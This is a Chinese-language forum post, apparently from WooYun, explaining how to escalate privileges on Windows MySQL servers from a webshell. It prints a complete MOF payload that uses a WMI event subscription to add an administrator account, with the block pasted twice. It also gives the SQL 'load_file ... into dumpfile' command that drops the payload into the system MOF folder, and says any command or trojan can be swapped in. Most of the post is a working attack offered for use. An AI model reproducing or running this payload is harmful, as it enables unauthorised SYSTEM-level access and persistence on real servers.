from:http://zone.wooyun.org/content/1795
這個:MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day
http://www.exploit-db.com/exploits/23083/
大致看了一下,原來是在導出文件的時候出的問題,具體怎麼出的問題,表示看mysql的源碼不是我能看的來的。。
大家都知道,要對方開啓mysql的外聯,並且有root密碼,這種情況只能用來掃肉雞了,還蛋疼的不行。所以我感覺用在webshell下輔助提權不錯,畢竟如果導udf什麼相對麻煩了一些。所以就有下面的利用:
1.找個可寫目錄,我這裏是C:\recycler\,把如下代碼寫到nullevt.mof文件裏(也就是他源碼裏的payload):
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
注意上面的net.exe user admin admin /add,可以隨便改的,想執行啥都行,有沒有參數也都行,執行自己的馬也行。
再然後,在菜刀裏連接mysql數據庫後執行:
select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
再然後。。你會發現用戶添加上去了。
注:測試環境爲windows 2003 + mysql 5.0.45-community-nt
win7旗艦版 sp1 + mysql-5.5.28 測試失敗,2008未測試。
不過那個利用ADS新建\lib\plugin目錄的bug還在,還可以利用那個去導udf提權的。